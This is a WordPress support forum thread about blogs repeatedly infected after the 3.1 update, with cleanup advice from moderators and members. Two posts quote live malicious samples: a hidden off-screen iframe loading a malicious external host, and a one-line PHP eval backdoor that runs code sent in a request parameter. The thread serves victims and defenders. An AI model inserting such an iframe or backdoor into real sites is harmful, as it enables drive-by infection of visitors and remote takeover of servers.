WordPress.org

Ready to get started?Download WordPress

Forums

All wordpress blogs being HACKED (21 posts)

  1. bremmerm
    Member
    Posted 3 years ago #

    All wordpress blogs are updated to 3.1.

    Code keeps getting put in followin file: public_html/index.php

    Code is:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    I delete it and a few hours later it is back. I have no idea how to clean this, all sites are being blocked by google.

    My host is bluehost. This has happened to all the wordpress blogs on two different accounts, one has a dedicated IP and one uses the shared IP.

  2. esmi
    Forum Moderator
    Posted 3 years ago #

  3. bremmerm
    Member
    Posted 3 years ago #

    Here is the code it places at the top of the websites:

    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://hdhj3skfskh.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="10" height="10"></iframe></div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

    and here is a link to one infected website: [Link removed] - This is a HUGE problem for business right now!

    You may not want to visit the website, it may give off a virus.

    *Note we have completely scanned our computers

  4. Samuel B
    moderator
    Posted 3 years ago #

    read esmi's links and follow the instructions

  5. bremmerm
    Member
    Posted 3 years ago #

    Man. That is goin to take a lot of working deleting and uploading all the blogs..

  6. Samuel B
    moderator
    Posted 3 years ago #

    no doubt - i've done it many times for clients, but it's the only sure way to get it clean

  7. kmosli
    Member
    Posted 3 years ago #

    Samuel B,

    Thanks for sharing, but which method you meant is the best one?

    My wife and I have a photo. business and our blog got hacked!

    Please advise,
    thanks
    Khaled Mosli

  8. Samuel B
    moderator
    Posted 3 years ago #

    the 1st link will do it
    the 2nd link is how to close the back doors
    also.
    http://codex.wordpress.org/Hardening_WordPress

  9. kmosli
    Member
    Posted 3 years ago #

    Thanks Samuel! I will get on it.

    I have a question though, What if I don't have a recent backup?

    Thanks again.

  10. Samuel B
    moderator
    Posted 3 years ago #

    What if I don't have a recent backup?

    hmmm...
    I would export my current db as an .sql file
    open it in notepad and do searches for the bad stuff

    back this file up before modifying

  11. kmosli
    Member
    Posted 3 years ago #

    Sure I will! will keep you posted.

    Thanks.
    Khaled

  12. kmosli
    Member
    Posted 3 years ago #

    Hey Samuel,

    You mentioned that you did it for clients! I was wondering if we would like you to do it for our business blog?

    Thanks
    Khaled

  13. Samuel B
    moderator
    Posted 3 years ago #

    You mentioned that you did it for clients! I was wondering if we would like you to do it for our business blog?

    sorry - I can't - I won't solicit business from this site

    however,
    http://jobs.wordpress.net/

  14. kmosli
    Member
    Posted 3 years ago #

    Oh sorry I didn't realize that you work for wordpress! I will check the website. By the way, I have nnot started the fixing, and all of the sudden, the blog loads just fine!

    Did you guys try to fix it? not sure what happened!

    Thanks
    Khaled Mosli

  15. bremmerm
    Member
    Posted 3 years ago #

    That has happened to me a few times. I think the code is set to disapear and reactivate. But yeah I thought everything was good after I went to a couple sites and it was okay again. But now they are all down yet again..

  16. bremmerm
    Member
    Posted 3 years ago #

    Manual -

    So if I have 4 blogs on a server, should I erase them all at the same time before uploading a fresh copy?

  17. Moodles
    Member
    Posted 3 years ago #

    moderator, the link he posted to the hacked site set off my antivirus program, has a trojan -- link should be removed

  18. mvandemar
    Member
    Posted 3 years ago #

    bremmerm - if all of the sites are running under the same username then yes, it is best to delete them all at the same time. If you have either cpanel or ssh access you can minimize the amount of downtime involved with that by uploading clean copies of the sites first, in compressed format. Then you delete them all, and upzip the new copies into their respective directories. Depending on the total size of the sites you could probably delete the infected ones and unzip the clean ones in a matter of minutes. Just make sure you don't try and delete them via ftp, as that can take ages to do. Once the files are all replaced you can clean the databases, or alternatively clean local copies of them first, then delete and re-upload the new ones.

  19. bremmerm
    Member
    Posted 3 years ago #

    Bedankt, mvandemar!

  20. WeWatch
    Member
    Posted 3 years ago #

    In a few of these very same cases, we've found the culprit to be a file that has nothing more than this in it:

    /** Sets up vars and included files. */

    if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

    /** Stop sets up vars and included files. */

    In many of these cases, this was found in an archives.php file in:

    wp-content/themes/classic/ folder, but we've found it in other files as well. If you look in the access-logs you'll see POSTs of between 7,200 and 7,900 bytes around the same time you're files are infected.

    This has typically happened before the upgrade to 3.1, but wasn't noticed until after.

  21. bremmerm
    Member
    Posted 3 years ago #

    Thanks for the info WeWatch

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.